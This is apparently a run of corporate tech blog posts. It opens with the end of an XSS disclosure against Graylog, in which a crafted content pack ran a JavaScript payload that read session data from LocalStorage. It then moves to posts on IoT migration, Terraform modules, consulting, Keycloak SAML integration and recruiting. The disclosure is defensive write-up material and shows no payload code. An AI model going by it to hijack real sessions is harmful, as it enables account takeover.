Below you can see a snippet of the JSON that was crafted for testing the attack vector.


Once our malicious content pack was imported in the system we got a beautiful (and not suspicious at all) link in the UI that executed our JavaScript payload once clicked.


As you can also see from both of the screenshots, we were able to capture the user’s session information with our payloads due to it being stored in the browser’s LocalStorage. Storing sensitive information such as the user’s session in the browser’s LocalStorage is not always such a great idea, as LocalStorage is meant to be available for JavaScript to read. Session details in LocalStorage along with a XSS vulnerability can lead to a nasty session hijacking situation.

Timeline

05.05.2020 – The vulnerabilities were found and reported to Graylog security team

07.05.2020 – The vendor confirmed that the vulnerabilities are being investigated

19.05.2020 – A follow-up query was sent to the vendor and they confirmed that fixes are being worked on

20.05.2020 – Fixes were released in Graylog versions 3.2.5 and 3.3.

 

References / Links

Read more about XSS:

https://owasp.org/www-community/attacks/xss/

https://portswigger.net/web-security/cross-site-scripting

 

AngularJS 1.6 sandbox removal:

http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html

 

Fixes / releases:

https://airflow.apache.org/docs/stable/changelog.html

https://community.grafana.com/t/release-notes-v6-7-x/27119

https://www.graylog.org/post/announcing-graylog-v3-3

 

Ye old timey IoT, what was it anyway and does it have an upgrade path?

What were the internet connected devices of old that collected data? Are they obsolete and need to be replaced completely or is there an upgrade path for integrating them into data warehouses in the cloud?

Previously on the internet

In the beginning the Universe was created.
This has made a lot of people very angry and been widely regarded as a bad move.

— Douglas Adams in his book “The restaurant at the end of the universe”

Then someone had another great idea to create computers, the Internet and the world wide web, and ever since then its been a constant stream of all kinds of multimedia content that one might enjoy as a kind of remittance for the previous blunders by the universe. (As these things, usually, go some people have regarded these as bad moves as well.)

Measuring the world

Some, however, enjoy a completely different type of content. I am talking about data, of course. This need for understanding and measuring the world around us has been with us ever since the dawn of mankind, but interconnected worldwide network combined with cheaper and better automation accelerated our efforts massively.

Previously you had to trek to the ends of the earth, usually accompanied with great financial and bodily risk, to try and set up test equipment or to monitor them with your senses and write down the readings to a piece of paper. But then, suddenly, electronic sensors and other measurement apparatus could be combined with a computer to collect data on-site and warehouse it. (Of course, back then we called warehouse of data a “database” or a “network drive” and had none of this new age poppycock terminology.)

Things were great; No need any longer to put your snowshoes on and risk being eaten by a vicious polar bear when you could just comfortably sit on your chair next to a desk with a brand new IBM PS/2 on it and check the measurements through this latest invention called Mosaic web browser or a VT100 terminal if your department was really old-school. (Oh, those were the days.)

These prototypes of IoT devices were very specialized pieces of hardware for very special use cases for scientists and other rather special types of folk and no Internet-connected washing machines were on sight, yet. (Oh, in hindsight ignorance is bliss. Is it not?)

The rise of the acronym

First, they used Dual-tone Pulse Modulation or DTMF. You put your phone next to the device, pushed a button on it and the thing would scream an ear-shattering series of audible pulses to your phone which then relayed them into a computer somewhere. Later, if you were lucky, a repairman would come over and completely disregard the self-diagnostic report your washing machine had just sent over the telephone lines and usually either fixed the damn thing or made the issue even worse while cursing computers all the way to hell. (Plumbers make bad IT support personnel and vice versa.)

From landlines to wireless

So because of this, and many other reasons, someone had a great idea to network devices like these directly to your Internet connection and cut the middle man, your phone, off the equation altogether. This made things simpler for everyone. (Except for the poor plumber who still continued to disregard the self-diagnostic reports.) And everything was great for a while again until, one day, we woke up and there was a legion of decades-old washing machines, tv’s, temperature sensors, cameras, refrigerators, ice boxes, video recorders, toothbrushes and plethora of other “smart” devices connected to the Internet.

Internet Of Things, or IoT for short, describes these devices as a whole and the phenomenon, the age, that created them.

Suddenly it was no longer just a set of specialized hardware for special people that had connected smart devices collecting data. Now it was for everybody. (This has, yet again, been regarded as a bad move.) We have to look past the obvious security concerns that this heat of connecting every single (useless) thing to the Internet has created, but we can also see the benefit. The data flows, and the data is the new oil as the saying goes.

And there is a lot of data

The volume of data collected with all these IoT devices is staggering and therefore just simple daily old-timey FTP transfers of data to the central server are no longer a viable way of collecting it. We have come up with different new protocols like REST, Websockets, and MQTT to ingest real-time streams of new data points to our databases from all of these data-collecting devices.

Eventually, all backend systems were migrated or converted into data warehouses that were only accepting data with these new protocols and therefore were fundamentally incompatible with the old IoT devices.

What to do? Obsolete and replace them all or is there something that can be done to extend the lifespan of those devices and keep them useful?

The upgrade path, a personal journey

As an example of an upgrade path, I shall share a personal journey on which I embarked in the late 1990s. At this point in time, this is a macabre exercise in fighting against the inevitable obsoletion, but I have devoted tears, sweat, and countless hours over the years to keep these systems alive and today’s example is no different. The service in question runs on a minimal budget and with volunteer effort; So heavy doses of ingenuity are required.

Vaisala weather station at Hämeenlinna observatory.
Vaisala weather station located at Hämeenlinna observatory is now connected with Moxa serial server to remote logger software.

 

Even though Finland is located near or in the arctic circle there are no polar bears around, except in a zoo. Setting up a Vaisala weather station is not something that will cause a furry meat grinder to release your soul from your mortal coil, no, it is actually quite safe. Due to a few circumstances and happy accidents, it is just what I ended up doing two decades ago when setting up a local weather station service in the city of Hämeenlinna. The antiquated 90’s web page design is one of those things I look forward to updating at some point, but today we are talking about what goes on in the background. We talk about data collection.

The old, the garbage and the obsolete

Here, we have the type of equipment that measures and logs data points about the weather conditions at a steady pace. Measurements, which are then read out by specialized software on a computer placed next to it since the communication is just plain old ASCII over a serial connection. The software is old. I mean really old. Actually I am pretty sure that some of you reading this were not even born back in 1998:

Analysis of text strings inside of a binary
Above image shows an analysis of the program called YourVIEW.exe that is used to receive data from this antiquated weather station. It is programmed with Labview version 3.243 that was released back in 1998. This software does not run properly on anything newer than Windows 2000.

This creates a few problematic dependencies; Problems that tend to get bigger with passing time.

The first issue is an obvious one: Old and unsupported version of Windows operating system. No new security patches or software drivers are available which in any IT scenario are a huge problem, but still a common one in any aging IoT solution.

The second problem is: No new hardware is available. No operating system support means no new drivers mean no new hardware if the old one brakes down. After spending a decade to scavenge this and that piece of obsolete computer hardware to pull together a somewhat functioning PC is a quite daunting task that keeps on getting harder every year. People tend to just dispose of their old PCs when buying a new one. The halflife of old PC “obtanium” is really short.

Third challenge: One can’t get rid of the Windows 2000 even if one wanted to since the logging software does not run on anything newer than that; And, yes, I tried even black magic, voodoo sacrifices and Wine under Linux to no avail.

And finally, the data collection itself is a problem: How do you modernize something that uses its own data collection /logging software and integrate it with modern cloud services when said software was conceived before modern cloud computing even existed?

Path step 1, an intermediate solution

As with any problem of technical nature after investigating the problem yields several solutions, but most of them are infeasible for a reason or another. In my example case, I came up with a partial solution that later enables me to continue building on top of it. At its core this is a cloud journey, an cloud migration, not much different from those I daily work with our customers at Solita.

For the first problem, Windows updates, we really can’t do anything about without updating the Windows operating system to more recent and supported release, but unfortunately, the data logging software won’t run anything newer than Windows 2000; Lift and shift it is then. The solution is to virtualize the server and bolster the security around the vulnerable underbelly of the system with firewalls and other security tools. This has the added benefit of improving service SLA due to lack of server/workstation hardware failures, network, and power outages. However, since the weather station communicates over a serial connection (RS232) we need to also somehow virtualize the added physical distance away. There are many solutions, but I chose a Moxa NPort 5110A serial server for this project. Combined with an Internet router capable of creating a secure IPSec tunnel between the cloud & on-site and by using Moxa’s Windows RealCOM drivers one can virtualize the on-site serial port to the remote Windows 2000 virtual server securely.

How about modernizing the data collection then? Luckily YourVIEW writes the received data points into CSV file so it is possible to write secondary logger with Python to collect those data points directly to a remote MySQL server as they become available.

Path step 2, next steps

What was before a vulnerable and obsolete piece of scavenged parts is still a pile of obsolete junk, but now it has a way forward. Many would have discarded it is garbage and thrown this data collection platform away, but with this example, I hope to demonstrate that everything has a migration path and with proper lifecycle management your IoT infrastructure investment does not necessarily need to be only a three-year plan, but one can expect to gain returns for even decades.

An effort on my part is ongoing to replace the MyView software all together with a homebrew logger that runs in a Docker container and published data with MQTT to the Google Cloud Platform IoT Core. IoT Core together with Google Cloud Pub/Sub assembles an unbeatable data ingestion framework. Data can be stored into, but not limited to, Google Cloud SQL and/or exported to BigQuery for additional data warehousing and finally for visualization for example in Google Data Studio.

Even though I use the term “logger” here the term “gateway” would be suitable as well. Old systems require interpretation and translation to be able to talk to modern cloud services. Either commercial solution exists from the vendor of the hardware or in my case I have to write one.

Together we are stronger

I would like to think that my very specific example above is unique, but I am afraid that is not. In principle, all integration and cloud migration journeys have their unique challenges.

Luckily modern partners, like Solita, with extensive expertise in cloud platforms like the Google Cloud Platform, Amazon Web Services or Microsoft Azure and in software development, integration, and data analytics can help a customer to tackle these obstacles. Together we can modernize and integrate existing data collection infrastructures for example in the web, healthcare, banking, at the factory floor, or in logistics. Throwing existing hardware or software into the trash and replacing them with new ones is time-consuming, expensive, and sometimes easier said than done. Therefore carefully planning an upgrade path with a knowledgeable partner might be a better way forward.

Even when considering investing in a completely new solution for data collection a need for integration is usually a requirement at some stage of the implementation and Solita together with our extensive partner network is here to help you.

Share your cloud infra with Terraform modules

Cloud comes with many advantages and one really nice feature is infrastructure as code (IaC). IaC allows one to manage data center trough definition files instead of physically configuring and setting up resources. Very popular tool for the IaC is Terraform.

Terraform is a tool for IaC and it works with multiple clouds. With Terraform configuration files are run from developers machine or part of the CI/CD pipelines. Terraform allows one to create modules, parts of the infrastructure that can be reused. A module is a container for multiple resources that are used together. Even for simple set up, modules are nice, as one does not need to repeat oneself, but they are very handy with some of the more resource-heavy setups. For example, setting up even somewhat simple AWS virtual private cloud (VPC) network can be resource heavy and somewhat complex to do with IaC. As VPC are typically setup in a similar fashion, generic Terraform modules can ease these deployments greatly.

Share your work with your team and the world

Nice feature of these Terraform modules is that you can fairly easily share them. As you are using these modules, you can source them from multiple different locations such as local file system, version control repositories, GitHub, Bitbucket, AWS S3 or HTTP URL. If, and when, you have your configuration files in version control, you can simply point your module’s source to this location. This makes sharing the modules across teams handy.

Terraform also has Terraform Registry, which is an index of modules shared publicly. Here you can share your modules with the rest of the world and really help out fellow developers. Going back to the VPC configuration, you can find really good Terraform modules to help you get started with this. Sharing your own code is really easy and Terraform has very good documentation about it [1]. What you need is GitHub repo named according to Terraform definitions, having description, right module structure and tag. That’s all.

Of course, when sharing you should be careful not to share anything sensitive and specific. Good Terraform Registry modules are typically very generic and self-containing. When sourcing directly from the outside locations, it is good to keep in mind that at times they might not be available and your deployments might fail. To overcome this, taking snapshots of used modules might be a good idea.

Also, I find it a good practice to have a disable variable in the modules. This way user of the module can choose whether to deploy the module by setting a single variable. This kind of variable is good to take into consideration all the way from the beginning because in many cases it affects all the resources in the module. I’ll explain this with the example below.

Send alarms to Teams channel – example

You start to build an application and early on want to have some monitoring in place. You identify the first key metric and start thinking about how to notify yourself on these. I run into this problem all the time. I’m not keen on emails, as those seem to get lost and require you to define who to send them to. On the other hand, I really like chats. Teams and Slack give you channels where you can collaborate on the rising issues and it is easy to add people to the channels.

In AWS, I typically create CloudWatch alarms and route them to one SNS topic. By attaching a simple Lambda function on this SNS one can send the message to the Teams, for example. In Teams, you control the message format with Teams cards. I created a simple card that has some information about the alarm and a link to the metric. I found myself doing this over again, so I decided to build a Terraform module for it.

Here is a simple image of the setup. Terraform module sets up SNS that in turn triggers Lambda function. Lambda function sends all the messages it receives to Teams channel. Set up is really simple, but handy. All I need is to route my CloudWatch alarms to the SNS that is setup by the module and I will get notifications to my Teams channel.

Simple image of the module and how it plugs into CloudWatch events and Teams

Module requires you only to give the Teams channel webhook URL where the messages are sent to. When you create CloudWatch alarm metrics you just need to send them to the SNS topic that the module creates. SNS topic arn is in the module output.

You can now find the Terraform module from the Terraform Registry with a name “alarm-chat-notification” or by following the link in the footer [2]. I hope you find it useful to get you going with alarms.

Disable variable

As I mentioned before, it is a good practice to have disable variable in the module. To do this in Terraform, it is a bit tricky. First, create a variable to control this, in my repo it is called “create” and it is a type of boolean defaulting true. Now all the resource my module has had to have the following line:

count = var.create ? 1 : 0

In Terraform this simply means that if my variable is false, this count is 0 and no resource will be created. Not the most intuitive, but makes sense. This also means that all the resources will be a type of list. Therefore, if you refer to other resources, you have to do it with list operation, even when we know that there is only one. For example, my lambda function refers to the role, it does it by referring to the first element in the list as follows:

aws_iam_role.iam_for_lambda[0].arn

Again this makes sense and it is good to keep in mind.

I hope this blog inspires you to create reusable Terraform modules for the world to use. And please, feel free to source the alarm module.

[1] https://www.terraform.io/docs/registry/modules/publish.html
[2] https://registry.terraform.io/modules/aloukiala/alarm-chat-notification/aws/

Author of this blog post is a data engineer who has built many cloud-based data platforms for some of the largest Nordic companies. 

How to win friends and influence people by consulting?

By definition consulting is easy, just advice people on how to do things in a wiser manner. But how to keep yourself motivated and your skills up-to date in this fast paced world is a totally different matter!

I have done consulting over the years in several different companies and have gathered a routine that helps achieving things described in the starting paragraph. Not everyone is cut for consulting, it requires a special type of person to succeed in it. I am not saying you need to be especially good on particular topics to be able to share your knowledge to your customers.

The first rule of thumb is that you never, never let your skills get old.  It does not matter how busy you are. Always, and i mean always, make some time to study and test new things. If you don’t you are soon obsolete.

Second rule of consulting 101 is that you need to keep yourself motivated, once work becomes a chore you lose your “sparkle” and customers can sense that. If you want to be on top of your game you need to have that thing which keeps customers coming back to you.

Third rule is that you keep you need to keep your customers happy. Always remember who pays your salary. This should be pretty obvious though.

Fourth and the most import rule is “manage yourself”. This is something extremely important in this line of work. It is easy to work too much, sleep too little and eventually have a burnout. This is something that takes practice but is absolutely necessary in the long run. To avoid working too much you need to know yourself and know what symptoms are signs that you are not well. I need to sleep, eat and exercise to avoid this kind of situation. Just saying “work less” is not always possible so good physical and mental health is essential.

Consulting business can be a cutthroat line of work where straight up strongest survive, some describe it as a meritocracy. But in Solita it is not so black and white. We have balanced the game here quite well.
Of course we need to work and do those billable hours. But we have a bit more leg room and we aim ourselves to be the top house in the nordics. Leaving the leftovers for the b-players to collect.

If you still think you might be cut for consulting work, give me call or whatsapp or contact by some other means

Twitter @ToniKuokkanen
IRCnet tuwww
+358 401897586
toni.kuokkanen@solita.fi
https://www.linkedin.com/in/tonikuokkanen/

https://en.wikipedia.org/wiki/How_to_Win_Friends_and_Influence_People 

Integrating AWS Cognito with Suomi.fi and others eIDAS services via SAML interface

AWS Cognito and Azure AD both support SAML SSO integration but neither supports encryption and signing of SAML messages. Here is a solution for a problem that all European public sector organizations are facing.

In the end of 2018, The Ministry of Finance of Finland aligned how Finnish public sector organizations should treat public cloud environments. To summarize, a “cloud first” -strategy. Everybody should use the public cloud, and if they don’t, there must be a clear reason why not. The most typical reason is, of course, classified data. The strategy is an extremely big and clear indication of change regarding how organizations should treat the public cloud nowadays.

To move forward fast, most applications require an authentication solution.  In one of my customer projects I was requested to design the AWS cloud architecture for a new solution with a requirement for strong authentication of citizens and public entities. In Finland, for public sector organizations there exists an authentication service called Suomi.fi (Suomi means Finland) to gain trusted identity. It integrates banks etc. to a common platform.  The service is following strictly the Electronic Identification, Authentication and Trust Services (eIDAS) standard. Currently, and at least in short term future perspective, the Suomi.fi supports only SAML integration.

eIDAS SAML with AWS Cognito – Not a piece of cake

Okay, that’s fine. The plan was to use AWS Cognito for strong security boundary for applications and it supports “the old” SAML integration. But in few hours later, I started to say No, Why and What. The eIDAS standard requires encrypted and signed SAML messaging. Sounds reasonable. However, soon I found out that AWS Cognito (or for example Azure AD) does not support it. My world collapsed for a moment. This was not going to be as easy as I thought.

After I contacted to AWS partner services and Suomi.fi service organization, it was clear that I need to get my hands dirty and build something for this. In Solita we are used to have open discussions and transfer information from mouth to mouth between project. So, I already knew that there are at least a couple of other projects that are facing the problem. They also are using AWS Cognito and they also need to integrate with eIDAS authentication service. This made my journey more fascinating because I could solve a problem for multiple teams.

Solution architecture

Red hat JBoss Keycloak is the star of the day

Again, because open discussion my dear colleague Ari from Solita Health (see how he is doing while these remote work period) pointed out that I should look into the product called Keycloak. After I found out that it is backed by Red Hat JBoss, I knew it has a strong background. The Keycloak is a single sign on solution which supports e.g. SAML integration for eIDAS service and OpenID for AWS Cognito.

Here is simple reference architecture from the solution account setup (click to zoom):

The solution is done with DevOps practices. There is one Git repository for Keycloak Docker image and one for AWS CDK project. The AWS CDK project is provisioning the square area components with dash line to the AWS account (and e.g. CI/CD pipelines not shown in the picture). The rest is done by the actual IaC-repository of each project because it varies too much.

We run Keycloak as a container in AWS Fargate service which has at least two instances always running in two availability zone in the region. The Fargate service integrates nicely with AWS ALB, for example if one container is not able to answer to health check request, it will not receive any traffic and soon it will be replaced by another container automatically.

Multiple keycloak instances forms a cluster. They need to share data between each other via TCP connection. The Keycloak uses jgroups to form the cluster. In the solution, the Fargate service register (and deregister) the new container to AWS Cloud Map service automatically and provides DNS interfaces to find out which instances are up and healthy. Keycloak uses “DNS PING” query method by jgroups to search others via Cloud Map DNS records.

The other thing what Keycloak clusters need is the database. In this solution we used AWS Aurora PostgreSQL PaaS database service.

The login flow

The browser is the key integrator element because it is redirected multiple times with payload from service to another. If you don’t have previous knowledge how  SAML works, check Basics of SAML Auth by Christine Rohacz.

The (simplified) initial login flow is described below. Yep, even it is hugely simplified, it still has so many steps.

  1. User enters access the URL of the application. The application is protected by AWS Application Load Balancer and its listener rule requires user to have valid AWS Cognito session. Because the session it is missing, user is redirected to the AWS Cognito domain.
  2. The AWS Cognito receives request and because no session found and identity provider is defined, it forwards the user again to the Keycloak URL.
  3. The Keycloak receives the request and because no session is found and SAML identity provider is defined, it forwards the user again to the Suomi.fi authentication service with signed and encrypted SAML AuthnRequest.
  4. After user has proven his/her identity at Suomi.fi service, the Suomi.fi service redirects user back to the Keycloak service.
  5. The Keycloak verifies and extracts the SAML message and its attributes, and forwards user back to the AWS Cognito service
  6. The AWS Cognito verifies the OpenID message and asks more user information via secret from Keycloak and finally redirects the user back to the Application ALB.
  7. The application’s ALB receives the identity and finally redirects the user back to the original path of the application’s ALB

Now user have session within the application ALB (not with the Keycloak ALB) for several hours.

The application receives internally few extra headers

The application ALB adds two JWT tokes via x-amzn-oidc-accesstoken and x-amzn-oidc-data headers to each request it sends to the backend. From those headers, the application can easily access to the information who is logged in and other information about the user profile in AWS Cognito. Those headers are only passed between ALB and the application.

Here is example of those headers:

Notice: the data is imaginary and for testing purpose by Suomi.fi

x-amzn-oidc-accesstoken: {
    "sub": "765371aa-a8e8-4405-xxxxx-xxxxxxxx",
    "cognito:groups": [
        "eu-west-1_xxxxxx"
    ],
    "token_use": "access",
    "scope": "openid",
    "auth_time": 1591106167,
    "iss": "https://cognito-idp.eu-west-1.amazonaws.com/eu-west-1_xxxxxx",
    "exp": 1591109767,
    "iat": 1591106167,
    "version": 2,
    "jti": "xxxxx-220c-4a70-85b9-xxxxxx",
    "client_id": "xxxxxxx",
    "username": "xxxxxxxxx"
}

x-amzn-oidc-data: {
    "custom:FI_VKPostitoimip": "TURKU",
    "sub": "765371aa-a8e8-4405-xxxxx-xxxxxxxx",
    "custom:FI_VKLahiosoite": "Mansikkatie 11",
    "custom:FI_firstName": "Nordea",
    "custom:FI_vtjVerified": "true",
    "custom:FI_KotikuntaKuntanro": "853",
    "custom:FI_displayName": "Nordea Demo",
    "identities": "[{\"userId\":\"72dae55e-59d8-41cd-a413-xxxxxx\",\"providerName\":\"Suomi.fi-kirjautuminen\",\"providerType\":\"OIDC\",\"issuer\":null,\"primary\":true,\"dateCreated\":1587460107769}]",
    "custom:FI_lastname": "Demo",
    "custom:FI_KotikuntaKuntaS": "Turku",
    "custom:FI_commonName": "Demo Nordea",
    "custom:FI_VKPostinumero": "20006",
    "custom:FI_nationalIN": "210281-9988",
    "username": "Suomi.fi-kirjautuminen_72dae55e-59d8-41cd-a413-xxxxxx",
    "exp": 1591106287,
    "iss": "https://cognito-idp.eu-west-1.amazonaws.com/eu-west-1_xxxxxx"
}

Security

There are multiple security elements and best practices in use also for this solution. For example, each environment of each system has their own AWS account as the first security boundary. So, there will be separate Keycloak installation for each environment.

There are few secret strings that are generated to the AWS Secret Manager and used by Keycloak service via secret injection in runtime by Fargate task definition. For example, the OpenID secret is generated and shared via AWS Secret Manager and it is newer published to code repository etc.

The Keycloak service is only published by the Suomi.fi realm. Eg. the default admin panel from default realm is not published to the internet. Realm is a Keycloak concept to have multiple solutions inside a single Keycloak system with boundaries.

The Keycloak stores user profiles but it can be automatically cleaned if required by the project.

About me

I’m a cloud architect/consultant for public sector customers in Finland in Solita. I have a long history with AWS. I found a newsletter that in September 2008 EBS service was announced.  Me and my brother were excited and commenting “finally persistent storage for EC2”. The EC2 were extended to Europe a month later. I know for sure that at least from 2008 I have used AWS services. Of course, the years have not been the same, but it is nice to have some memories with you.

What have you always wanted to know about the life of Solita’s Cloud expert?

What’s it like to work at Solita and in the Cloud team? During recruitment meetings and discussions, candidates bring up a range of questions and preconceptions about life at Solita. I asked Helinä Nuutinen from our Cloud Services team in Helsinki to answer some of the most common ones. She might be a familiar face to those who’ve had a technical interview with us.

 

Helinä, could you tell us a little bit about yourself?

I’ve been with Solita for a year as a Cloud Service Specialist in the Cloud Services team. Before that, I worked with more traditional data centre and network services. I was particularly interested in AWS and DevOps, but the emphasis of my previous role was a little different. I participated in Solita’s AWS training, and before I knew it, I started working here.

Currently, I’m part of the operations team of our media-industry customer. Due to coronavirus, we’re working from home, getting used to the new everyday life. I have five smart and friendly team mates, with whom I would normally sit at the customer site from Monday through Thursday. The purpose of our team is to develop and provide tools and operational support services for development teams. We develop and maintain shared operational components such as code-based infrastructure with Terraform and Ansible, manage logs with Elasticsearch Stack as well as DevOps tools and monitoring.

I typically spend my free time outdoors in Western Helsinki, take care of my window sill garden, and work on various crafting and coding projects. Admittedly, lately I haven’t had much energy to sit at the computer after work.

Let’s go through the questions. Are the following statements true or false?

#1 Solita’s Cloud team only works on cloud services, and you won’t succeed if you don’t know AWS, for example.

Practically false. Solita will implement new projects in the public cloud (AWS, Azure, GCP) if there are no regulatory maintenance requirements. We produce regulated environments in the private cloud together with a partner.

To succeed at Solita, you don’t have to be an in-depth expert on AWS environments – interest and background in similar tasks in more traditional IT environments is a great start. If you’re interested in a specific cloud platform, we offer learning paths, smaller projects, or individual tasks.

Many of our co-workers have learned the ins and outs of the public cloud and completed certifications while working at Solita. We are indeed learning at work.

#2 At Solita, you’ll be working at customer sites a lot.

Both true and false. In the Cloud team, it’s rare to sit at the customer site full time. We’re mindful of everyone’s personal preferences. I personally like working on site. Fridays are so-called office days when you have a great reason to visit the Solita office and hang out with colleagues and people you don’t normally meet.

In consulting-focused roles, you’ll naturally spend more at the customer site, supporting sales as well.

(Ed. Note: Our customers’ wishes regarding time spent on site vary. In certain projects, it’s been on the rise lately. However, we will always discuss this during recruitment so that we’re clear on the candidate’s preferences before they join us.)

#3 Solita doesn’t do product development.

Practically false – we do product development, too. Our portfolio includes at least ADE (Agile Data Engine) and WhiteHat. Our Cloud Services team is developing our own monitoring stack, so we also do “internal development”.

(Ed. Note: The majority of Solita’s sales comes from consulting and customer projects, but we also do in-house product development. In addition to WhiteHat and Agile Data Engine, we develop Oravizio, for example. Together, these amount to about 2 MEUR. Solita’s net sales in 2019 was approximately 108 MEUR.)

#4 If you’re in the Cloud team, you need to know how to code.

Sort of. You don’t have to be a super coder. It also depends what kind of projects you have in the pipeline. However, in the Cloud Services team, we build all infrastructure as code, do a lot of development work around our monitoring services, and code useful tools. We’re heavy users of Ansible, Python Terraform and Cloudformation, among others, so scripting or coding skills are definitely an advantage.

#5 The team is scattered in different locations and works remotely a lot.

Sort of true. We have several Cloud team members in Helsinki, Tampere and Turku, and I would argue that you’ll always find a team mate in the office. You can, of course, work remotely as much as your projects allow. Personally, I like to visit the office once a week to meet other Solitans.

To ease separation, we go through team news and discuss common issues in bi-weekly meetings. During informal location-specific discussions, we share and listen to each other’s feedback.

#6 I have a lengthy background in the data centre world, but I’m interested in the public cloud. Solita apparently trains people in this area?

True. We offer in-house learning paths if you’re looking to get a new certfication, for example, or are otherwise interested in studying technology. You’ll get peer support and positive pressure to study at the same pace with others.

As mentioned earlier, public cloud plays a major role in our work, and it will only get stronger in the future. The most important thing is that you’re interested in and motivated to learn new things and work with the public cloud.

(Ed. Note: From time to time, we offer free open-to-all training programmes around various technologies and skills.)

#7 The majority of Solita’s public cloud projects are AWS projects.

True. I don’t have the exact figures, but AWS plays the biggest part in our public cloud projects right now. There’s demand for Azure projects in the market, but we don’t have enough people to take them on.

(Ed. Note: The share of Azure is growing fast in our customer base. We’re currently strengthening our Azure expertise, both by recruiting new talents, and by providing our employees with the opportunity to learn and work on Azure projects.)

#8 Apparently Solita has an office and Cloud experts in Turku?

Yes! In Turku, we have six Cloud team members: four in the Cloud Services team (including subcontractors) plus Antti and Toni who deliver consulting around cloud services. I haven’t been to the office but I hear it’s fun.

(Ed. Note: Solita has five offices in Finland: Tampere, Helsinki, Oulu, Turku and Lahti. At the moment, Cloud is represented in all other cities except Oulu and Lahti.)

#9 Solita sells the expertise of individuals. Does this mean I’d be sitting at the customer site alone?

Mostly a myth. It depends on the project – some require on-site presence from time to time, but a lot work can be done flexibly in the office or remotely. No one will be forced to sit at the customer site alone. Projects include both individual and team work. This, too, largely depends on the project and the employee’s own preferences.

#10 Solita doesn’t have a billing-based bonus.

True. If we have one, no one has told me.

(Ed. Note: Solita’s compensation model for experts is based on a monthly salary.)

#11 Solita only works with customers in the public sector.

False. Solita has both public and private sector customers, from many different industries.

(Ed. Note: In 2019, around 55% of our Cloud customers were from the private sector.)

#12 Projects require long-term commitment, so you’ll be working on the same project for a long time.

True, if that’s what you want! When I started at Solita, my team lead asked me in advance what kind of projects I’d like to be part of, and what would be an absolute no-no. I’m happy to note that my wishes have actually been heard. But it might be because I’m not picky. Projects can last from a few days to years, and people might be working on several projects at the same time. Of course, you can also rotate between projects, so a final commitment isn’t necessary.

Helinä was interviewed by Minna Luiro who’s responsible for the Cloud unit’s recruiting and employer image at Solita. Do you have more questions or thoughts around the above topics? You can reach out to Minna: +358 40 843 6245 or minna.luiro@solita.fi.

If you’re excited about the idea of joining Solita’s Cloud team, send us an open application. You can also browse our vacancies.